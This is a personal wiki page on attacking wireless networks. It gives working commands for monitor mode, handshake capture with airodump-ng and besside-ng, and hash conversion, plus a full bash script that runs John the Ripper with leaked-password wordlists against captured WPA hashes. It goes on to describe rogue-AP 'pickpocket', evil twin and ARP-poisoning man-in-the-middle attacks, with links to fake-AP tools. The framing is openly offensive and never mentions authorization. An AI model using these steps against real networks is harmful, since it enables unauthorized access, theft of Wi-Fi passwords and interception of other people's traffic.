From charlesreid1

Reboot: Wireless

Revisiting some wireless attack techniques.

Classic WPA Cracking

Monitor wireless

First is aircrack to monitor wifi networks.

Start by putting the wifi card in monitor mode:

$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up

Now you can use that interface to scan for wireless network activity:

$ airodump-ng -i wlan1 -w output_file

This will output information about wireless network activity to a file.

Obtain handshakes

You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.

Specify -W for wpa only, and specify your network interface:

$ besside-ng -W wlan1

That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.

Crack handshakes

Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:

#!/bin/sh

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

cap="wpa.cap"

pwdir="/root/box/08_besside"

# Round 0
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            if [ "${rules}" == "" ] ; then

                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
                cd ${mypwd}

            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules}  ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk  ${pwfile}
                cd ${mypwd}

            fi

        done
    done
done

Settle in, because we'll be here a while.

Alternatives to Cracking WPA

So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?

Rogue AP: WPA Pickpocket

A rogue access point (AP) is an AP that is installed somewhere where it should not be, for the purpose of stealing information.

In the WPA pickpocket attack, a rogue AP is set up with an SSID to match the SSID of a "remembered" network on a device nearby. The rogue AP advertises that SSID, and the target device attempts to connect to it. When the target attempts to authenticate with the fake access point, it will fail (the password will also not be correct). The client half of the handshake process is captured by the rogue AP. This is called "half handshake" mode.

This is how the conversation goes:

Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?

Evil Twin AP: (Listens for a bit)

Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?

Evil Twin AP: (Puts on disguise) Well hello, yes, I am "Linksys Home." Over here. Yes, hello.

Sheep Client Device: Oh, wow! Boy am I glad I found you! Even though I'm at the airport and you couldn't possibly be my home network, I'll trust you anyway. Here's my wifi password. Can I check my email now?

Evil Twin AP: Thanks for the password. Let me validate it. I'll be right back... (Disappears)

This is possible because computers and phones are often set to "remember" wireless networks that are joined. What happens when your device remembers a wireless network is, it's added to a list of routers it remembers, and every time the wireless card is up and unconnected, it constantly broadcasts requests for those particular networks. This is convenient if you don't want to have to enter your username and password every time you want to log in to your home network, but it is also information that can be used against you.

Note that this attack can be carried out with zero information about the target. No network access is required.

Evil Twin Attack:

In the evil twin attack, the attacker utilizes information publicly broadcast by clients to trick the client into thinking it sees an access point it remembers - but it's actually an evil twin. This allows an attacker to hijack traffic going from the client to the (trusted, evil) access point.

Rogue AP refers to any illicit router. An Evil Twin AP refers more specifically to a Rogue AP being used as part of a wireless man-in-the-middle attack scenario.

One way to do this is for the Evil Twin AP to pick a nearby router and pretend to be the nearby router, tricking clients into connecting to it, the Evil Twin AP, instead of the legitimate AP. This can usually be done by overpowering the radio signal of the original AP, so cranking up the power on the Evil Twin AP usually works. If the Evil Twin AP is connected to the internet, or to the same network as the original AP (or, for bonus points, if it can maintain a separate connection to the original AP and tunnel hijacked connections through to it), the clients may not detect the attack. (Things will get complicated if they try and use HTTPS, but that's another topic for another page. See SSLStrip.)

Note that this attack can be carried out with zero information about the target (other than, perhaps, where the target is located.) No network access is required.

Man in the Middle Attack:

Main pages: Man in the Middle, Man in the Middle/Wired, ARP Poisoning

A rogue AP can be used for stealing passwords of associated networks, or for wireless man-in-the-middle attacks, as in the above scenarios. These required no information about the network or device, and were using information broadcast by the device itself, or a physical attack, to obtain control. These are your "can't get network access" options.

If you happen to be on the same network, on the same router, as your sheep client device, you can carry out other types of attacks to hijack a network session, like ARP Poisoning. This attack tampers with the routing table on the router, which assigns hardware to IP addresses. It is possible to trick the router into thinking you are the client, and trick the client into thinking you are the router.

Making Fake APs

hostapd

In general, you can make fake access points using the hostapd tool. This software turns wifi cards into access points. There are plenty of notes on the wiki about how to use hostapd. Here are a few links:

Raspberry Pi#Wifi Access Point - setting up hostapd on the Raspberry Pi so it can act as a wireless router

RaspberryPi/Access_Point - more of the same, I guess.

Kali Raspberry Pi/WirelessRouter - supposed to be the same as above, but ends with "abandon ship"

Kali_2016-03-13 - tips and tricks on generating wireless traffic on a network.

This process is also covered here: https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/

Github repo for script to create fakeap in 1 command: https://github.com/DanMcInerney/fakeAP

Need to clean up some of these pages and reorganize the content:

  • Rogue APs (umbrella term)
  • Rogue Pickpocket APs
  • Evil Twin APs (wireless mitm)
  • Fake APs

Other Stuff

airbase-ng: http://aircrack-ng.org/doku.php?id=airbase-ng

  • complicated tool, but basically, focuses on client attacks, so acting as an AP or ad-hoc AP

airpwn: http://airpwn.sourceforge.net/Airpwn.html

  • Live traffic injection for 802.11 packets

What's Next

What comes after wireless? This page [1] puts it well:


There’s a whole bunch of evil stuff to be done once we’re in the middle of communications. MITM tools like responder, evilgrade and sslsplit come to mind. In our case, selectively spoofing DNS queries and redirecting users to our own phishing site was sufficient for our task. Lastly, we’ve added the Karma patch to our hostapd package, which causes the AP to probe requests not just for itself but for any ESSID requested. This allows the AP to act as a lure to draw in any clients probing for known networks. Let the games begin!


The point of wireless hacking is to gain control of the communication channel - once you gain access, you pivot to a different toolset, and decide what to do with the channel. Cut it off? Modify it in transit? Record it? Search for things to flag? It all depends on what you want to do and what the target system is. This kind of decision-tree branching, with infinite possibilities, is what makes modern hacking so hilariously and frighteningly powerful.

Packet injection: http://airpwn.sourceforge.net/Airpwn.html

Let's work a little more on the workflow, and address those "now what" questions: Kali/Workflow

Flags